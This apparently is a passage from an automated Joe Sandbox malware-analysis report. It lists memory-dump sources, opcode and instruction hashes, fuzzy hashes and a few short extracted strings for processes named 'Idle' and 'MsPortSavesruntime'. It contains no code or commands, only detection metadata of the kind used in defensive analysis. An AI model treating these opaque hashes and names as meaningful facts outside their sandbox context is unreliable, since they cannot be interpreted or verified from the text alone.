                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ce0594d74662a3e7710401447a1c56f810fad8591153e79ac0b3614562c5ba31
                                                                                                                    • Instruction ID: c2277998880809ceab64d287fd723d811344b58b83f6a113f6022b812cc2b603
                                                                                                                    • Opcode Fuzzy Hash: ce0594d74662a3e7710401447a1c56f810fad8591153e79ac0b3614562c5ba31
                                                                                                                    • Instruction Fuzzy Hash: 9CE09270F0B50E4EF370BBA0C425BB9A2509F50300F0505B8D54E972E2CDFC6D808B89
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                    • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                                                                    • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                                                                    • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0fb3efcf4e2c824c2e53e4771428e456c43f1557ca1d097a1e0362776a8ad338
                                                                                                                    • Instruction ID: fa71dc34f7636e17fe5988646eafb684ac2d073921b1eca0590ebd09541fd8eb
                                                                                                                    • Opcode Fuzzy Hash: 0fb3efcf4e2c824c2e53e4771428e456c43f1557ca1d097a1e0362776a8ad338
                                                                                                                    • Instruction Fuzzy Hash: E1D02230B509040FC70CA73888588707390EB6A20378100A9D00AC72B1EA6ADC88C740
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9baf0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e90708a79087e72b77d4e0fa24157253c780a8196c08309517985a8ca87fb076
                                                                                                                    • Instruction ID: 39338a1400de4685a22523cad2c097125d9b9ceb574e0406f8d6a26d10e926e6
                                                                                                                    • Opcode Fuzzy Hash: e90708a79087e72b77d4e0fa24157253c780a8196c08309517985a8ca87fb076
                                                                                                                    • Instruction Fuzzy Hash: 9CD01234B519044FC71CA7388C598747791EBAA31679540A9E00AC72B1D96ADD89C781
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bad0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 68381363574eaf18cd81102a9ee77ef55bcf49bd13979f4a767ad885cbd449d1
                                                                                                                    • Instruction ID: 081fc227c8d8a9997daee36293996a041011ad2d287f27ab30f74fa48504657b
                                                                                                                    • Opcode Fuzzy Hash: 68381363574eaf18cd81102a9ee77ef55bcf49bd13979f4a767ad885cbd449d1
                                                                                                                    • Instruction Fuzzy Hash: 81D05E20F0DD0F4BEB76EB8888A07B92194AF54300F030635E40DC31B6CE68FA018601
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bac0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0459ac410696d2e2134450c8e0d7df9746b7695f4c53fbe190c7fcc484e627f3
                                                                                                                    • Instruction ID: b13b38c8d39ab1264fec170fc920e3c3775d6267c61e36cb0e0be2ca0e863ace
                                                                                                                    • Opcode Fuzzy Hash: 0459ac410696d2e2134450c8e0d7df9746b7695f4c53fbe190c7fcc484e627f3
                                                                                                                    • Instruction Fuzzy Hash: B3D05E05F1D45A56E36AA36408208BA08870F95328F090234E01E863E9EC9C6A0152C3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bac0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b764fbe3770bf2e3e072d769b89b0d506276cd4e1d123e9c4e624545fc2e8e70
                                                                                                                    • Instruction ID: b720bbda805eb6feea1ef703b78fb58e0e5b4b83c0fe90d7bb9d259d3c638fab
                                                                                                                    • Opcode Fuzzy Hash: b764fbe3770bf2e3e072d769b89b0d506276cd4e1d123e9c4e624545fc2e8e70
                                                                                                                    • Instruction Fuzzy Hash: 41C04C3052580D8FCA54FB7DC98595476A0FB0D215BD60190E40DC7171E69A9D95D741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bac0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                    • Instruction ID: f9bd5b7c055a8adc5226548f1e553392da6241cdc07abab4a0ce757127c62410
                                                                                                                    • Opcode Fuzzy Hash: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                    • Instruction Fuzzy Hash: C3C08C3051180C8FC908FB28C88582833A0FB09300BC20090E008C7174D259DCC0C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001E.00000002.2942806630.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_30_2_7ffd9bac0000_Idle.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4ed4acf919981f74455dc4cc80fb6e6734cc38eca516e527d93556e62a2cdd7c
                                                                                                                    • Instruction ID: db7d7326a4ed3d64de75acb640173bc13af19e40b23d4564a226e3b22930fddb
                                                                                                                    • Opcode Fuzzy Hash: 4ed4acf919981f74455dc4cc80fb6e6734cc38eca516e527d93556e62a2cdd7c
                                                                                                                    • Instruction Fuzzy Hash: 4DB01200D5740F00E83433FA085607970405B44100FD20170D80C81091D8CE12D4034A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bab0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2d83c6358ef068c844c1735831fb99fd8e5eb99fbc9dfaa4679d9c9b8e5e2dc4
                                                                                                                    • Instruction ID: cea0f2da4eb53e17028b22bbf0f49a64db796fea532365a81d94afdca8db27da
                                                                                                                    • Opcode Fuzzy Hash: 2d83c6358ef068c844c1735831fb99fd8e5eb99fbc9dfaa4679d9c9b8e5e2dc4
                                                                                                                    • Instruction Fuzzy Hash: BEC2D831B1D91E4FEBA8EB5884A16B87392FFA8350F1545B9D01DC32D6DD74BD818B80
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9baa0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5[_H
                                                                                                                    • API String ID: 0-3279724263
                                                                                                                    • Opcode ID: 6e32fe3194b1a5400265636f0bf568352ab87c05854215719f5c69babc30e852
                                                                                                                    • Instruction ID: c4af831b3a83d1b1e051c1c3f564262794b33a5e82e39f9642f1c67731146a76
                                                                                                                    • Opcode Fuzzy Hash: 6e32fe3194b1a5400265636f0bf568352ab87c05854215719f5c69babc30e852
                                                                                                                    • Instruction Fuzzy Hash: B8912472A19A8E4FE799CB68C8757A87FE1EF9A310F0401BED04DD72E6DAB41810C750
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bab0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cbeeeac038728d663f6e41a721f4b11daf0f2e5019bb4262bbb6119e17496591
                                                                                                                    • Instruction ID: dba8400751f45d3b6ea415021d12e43c498ca1766752687f526843b070c238b5
                                                                                                                    • Opcode Fuzzy Hash: cbeeeac038728d663f6e41a721f4b11daf0f2e5019bb4262bbb6119e17496591
                                                                                                                    • Instruction Fuzzy Hash: 1662B531B19A1D4FEBA8EB5884A17B87392FFA8350F1541B9D01DC72D6DD74BD828B40
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bad0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4486941c3cdbdb7731487899343bc29db036dd47a440cb474761b18565ea49b0
                                                                                                                    • Instruction ID: cfac79357b714cf95c29fffbec41e20b7ed29132a9e9a30a8a662a58297625be
                                                                                                                    • Opcode Fuzzy Hash: 4486941c3cdbdb7731487899343bc29db036dd47a440cb474761b18565ea49b0
                                                                                                                    • Instruction Fuzzy Hash: 91A1B030A2E65E06E33C5B5848B20B17381EFD1609B2A83BDC9DB8349BDD687607C2C5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9baa0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: c9$!k9$"s9
                                                                                                                    • API String ID: 0-3426396564
                                                                                                                    • Opcode ID: ffac835e2f05b268a47b47cbdfc9e75fd8dbe3abded5139aa5c9dce521129eec
                                                                                                                    • Instruction ID: 7986858b9e6c5300948e00b87edff46ce1d877cce2ff96440855ded4cfcc4853
                                                                                                                    • Opcode Fuzzy Hash: ffac835e2f05b268a47b47cbdfc9e75fd8dbe3abded5139aa5c9dce521129eec
                                                                                                                    • Instruction Fuzzy Hash: AA01442B72995A4BC641A73EF8601E83B40EBC61367960AB7C244CB1A2E2401C9FC3E0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bad0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: a40eb188c36f889bfa1e4cf6e916c91782639f4797efdbea66c2414ff3e0606c
                                                                                                                    • Instruction ID: e0ba9ad1c25dfae56a1a2d086c6f354f35325e16cf4f24864aaf251abe146912
                                                                                                                    • Opcode Fuzzy Hash: a40eb188c36f889bfa1e4cf6e916c91782639f4797efdbea66c2414ff3e0606c
                                                                                                                    • Instruction Fuzzy Hash: E301AF6190F3C54FCB16A7794829454BF60EE6721178A45FFC086CF1B3E92D888AC701
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bad0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: feb8c4853d861de8ec06fc1538966913e358acf99ea666012d171116c55be684
                                                                                                                    • Instruction ID: 26592113576bd872232c320d19bd3171aff10232ae63228d1b7fd654ae6812d4
                                                                                                                    • Opcode Fuzzy Hash: feb8c4853d861de8ec06fc1538966913e358acf99ea666012d171116c55be684
                                                                                                                    • Instruction Fuzzy Hash: CCE0927060A3844FC71AAA3484684547F61EF6720134A42EEC046CF2A7EA2DC889C701
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bad0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: 8a3a6f90e931393c79678263a8deb10e4d5f16eab16c1aa0c185260cb08c0dea
                                                                                                                    • Instruction ID: 55d31295c81f1e348fb6e1d23bbb3dfa1d6cea69397952c43f37964591a486bf
                                                                                                                    • Opcode Fuzzy Hash: 8a3a6f90e931393c79678263a8deb10e4d5f16eab16c1aa0c185260cb08c0dea
                                                                                                                    • Instruction Fuzzy Hash: 3AE0ED6164F3C44FCB1AAA788868455BF61EE6721174A51EEC146CF2A7EA2D8889C701
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bad0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: 35744617c84db836feb919bb91f2e490f0eda55c2c78ac7618c5f691828e0171
                                                                                                                    • Instruction ID: 5612e7a30d6583512e17c3e451c45d12339f88add20c835867acbc9ef7715167
                                                                                                                    • Opcode Fuzzy Hash: 35744617c84db836feb919bb91f2e490f0eda55c2c78ac7618c5f691828e0171
                                                                                                                    • Instruction Fuzzy Hash: 61E06D6160E7C44FC72AEB34886E955BFA0EF6721174A42EFC045CF1A7EA2DC889C701
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bad0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: a6e970775e2859f03b3ad4b0779b0541072726485bf541de2432d10a5ffe4dfd
                                                                                                                    • Instruction ID: 6592a33163bdf2f7464fb226d3857078fe389c6a8c9af7c017980429d3a360c1
                                                                                                                    • Opcode Fuzzy Hash: a6e970775e2859f03b3ad4b0779b0541072726485bf541de2432d10a5ffe4dfd
                                                                                                                    • Instruction Fuzzy Hash: 4EE09271A0E7C44FCB16EB38886D454BFA0EF6721174A42EEC086CF1A3EA2DC885C701
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bab0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: 348ec9baeb6e6b646584383076fc8c98fff7692c746cec510eaa7d836999d6fa
                                                                                                                    • Instruction ID: 197f583b8358da3f1caff797b508729beacc528feb7325b8066a3a1db80a0b89
                                                                                                                    • Opcode Fuzzy Hash: 348ec9baeb6e6b646584383076fc8c98fff7692c746cec510eaa7d836999d6fa
                                                                                                                    • Instruction Fuzzy Hash: 48E06D71A0F7C44FCB16AA348869454BFA1EF6720174A45EFC086CF1A3EA2DC889CB01
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bad0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: I
                                                                                                                    • API String ID: 0-3707901625
                                                                                                                    • Opcode ID: 3b01c32a8db625db79439b0f532572df12e4833894648f53aa2389093e2ecf6f
                                                                                                                    • Instruction ID: 06bfdfce98970260d87842595fce4e6a6cca1ad4e9971ef279d4e0716a5f52cf
                                                                                                                    • Opcode Fuzzy Hash: 3b01c32a8db625db79439b0f532572df12e4833894648f53aa2389093e2ecf6f
                                                                                                                    • Instruction Fuzzy Hash: ABE01A6154E3C44FCB0AEB7488698547FA0AE6B21078A40EEC146CF1B3E62D8949C701
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9baa0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 164fd3e82e631215222192ea89dd3f7c96f1daf87440b9d7e8fbace0469caa74
                                                                                                                    • Instruction ID: 1517baf7095405da799df410e08b851d1d95d718ca3a92126705aa35cc16c7eb
                                                                                                                    • Opcode Fuzzy Hash: 164fd3e82e631215222192ea89dd3f7c96f1daf87440b9d7e8fbace0469caa74
                                                                                                                    • Instruction Fuzzy Hash: E6415C12B0D5590AD728F77CA4A56F97781EF5933AF0805FBE44ECB1E7CD146841C294
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bad0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 09230796098635acc87fd746607d390f3bad37b3f21dba0211c6400f99227472
                                                                                                                    • Instruction ID: 3804596b5009478f376f43c51025f7ae5d47495a0d2982b5f4ddf7b758d1ade0
                                                                                                                    • Opcode Fuzzy Hash: 09230796098635acc87fd746607d390f3bad37b3f21dba0211c6400f99227472
                                                                                                                    • Instruction Fuzzy Hash: 49412971B1990E4FEBA4EB6CC8A5AA873D2FFD8350F05437AE81DC31E2DD64A9414740
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bad0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9ef75ae1c0cf23d64275d35200a5d11c3886be4b9e95b86f430aa272f97d594f
                                                                                                                    • Instruction ID: c751e5c4e010bdb0c2c85131950cbd8f24408406ebd71d81b94490fce97305e9
                                                                                                                    • Opcode Fuzzy Hash: 9ef75ae1c0cf23d64275d35200a5d11c3886be4b9e95b86f430aa272f97d594f
                                                                                                                    • Instruction Fuzzy Hash: BC41E831B0DA198FEB68DB98C4A07B47392EB98350F05477AD04DD72D6CE786D86C780
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9baa0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 768dc9eee0accc154f3d016eba5bb011f0ea4dada85d163aa6482f7da501ace7
                                                                                                                    • Instruction ID: 331dbb155d3234d2d56696e7345a771d0a550389884f26ebab562d54b340db9d
                                                                                                                    • Opcode Fuzzy Hash: 768dc9eee0accc154f3d016eba5bb011f0ea4dada85d163aa6482f7da501ace7
                                                                                                                    • Instruction Fuzzy Hash: CD213621B1E90E0FE758A76C84AA67A76D3EF9C320F0500BDE40EC32E7DD54AC418281
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9baa0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 089d258a5cc363ce70f145cdb58cc5e3c979ad560d732bd0adae5a774ea4f78a
                                                                                                                    • Instruction ID: f21b1120d66187fee4065d9563eb51f12cb70341d1c272b004ab19b078883d00
                                                                                                                    • Opcode Fuzzy Hash: 089d258a5cc363ce70f145cdb58cc5e3c979ad560d732bd0adae5a774ea4f78a
                                                                                                                    • Instruction Fuzzy Hash: FC31C631A0D68E4FDB56EB64C8649A97FF1EF6A300B0901BBC009D71A2DA68A545CB50
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9baa0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: fcad181a6e7658e16e7bbb73b38649c13dcb5b925a78511a770fd3b79d5424b2
                                                                                                                    • Instruction ID: d77abb9c5a4b1f9fbf6acb1438bf0855950603962f3318c838306cb0dd9ebcc4
                                                                                                                    • Opcode Fuzzy Hash: fcad181a6e7658e16e7bbb73b38649c13dcb5b925a78511a770fd3b79d5424b2
                                                                                                                    • Instruction Fuzzy Hash: 2A215221F1950E4AEBB8EB5884686B862D2FF48700F5241B9E44ED32B2DE786E418714
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bad0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 361aee9bcb13f4204747d98d2f769bfe6f155e743077a87614e2649db9c3cc61
                                                                                                                    • Instruction ID: a116c31dcb26057b38b335e5f7d46e37c90fabfc513e1dc710a71d4e9040f822
                                                                                                                    • Opcode Fuzzy Hash: 361aee9bcb13f4204747d98d2f769bfe6f155e743077a87614e2649db9c3cc61
                                                                                                                    • Instruction Fuzzy Hash: CB110637B0A5060BD319A75CECA64E47760EF9523F70803F3F049CE2A7ED159956C280
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9baa0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c435ec07ecf514d6784a90c5784a67cedab364507c054bb60b1e910602959ba1
                                                                                                                    • Instruction ID: d03995a150cebfaa0439456c8c5444fcb636f04d95e69fa1c79bf11391da3a97
                                                                                                                    • Opcode Fuzzy Hash: c435ec07ecf514d6784a90c5784a67cedab364507c054bb60b1e910602959ba1
                                                                                                                    • Instruction Fuzzy Hash: A521F635B0D68D8FE332DBA8C8652DC7FA0EF42325F1645B7C0488B1E2D578164AC765
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bad0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 06d4c203c55d1f033b5da4dd6834321b3cb4db63cf47840347f061b17f341d53
                                                                                                                    • Instruction ID: b338aa56d2f4a4fee1b15fe75bf5ff7c3b5368759088741d039c8e1c97be5955
                                                                                                                    • Opcode Fuzzy Hash: 06d4c203c55d1f033b5da4dd6834321b3cb4db63cf47840347f061b17f341d53
                                                                                                                    • Instruction Fuzzy Hash: 4A012B36B0D4194AE328F7ACBCB58E53750EF9533F70543B3E1498D0A7EC155445C291
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001F.00000002.2717889301.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_31_2_7ffd9bab0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e9e5cba875871d5141bed70bc16046da92049d9163bc77c0106fb09a974dbdbf
                                                                                                                    • Instruction ID: 8598fbe6f5c77e2603a15392517c24fc24743804bc2e641c436986364e2a7355
                                                                                                                    • Opcode Fuzzy Hash: e9e5cba875871d5141bed70bc16046da92049d9163bc77c0106fb09a974dbdbf
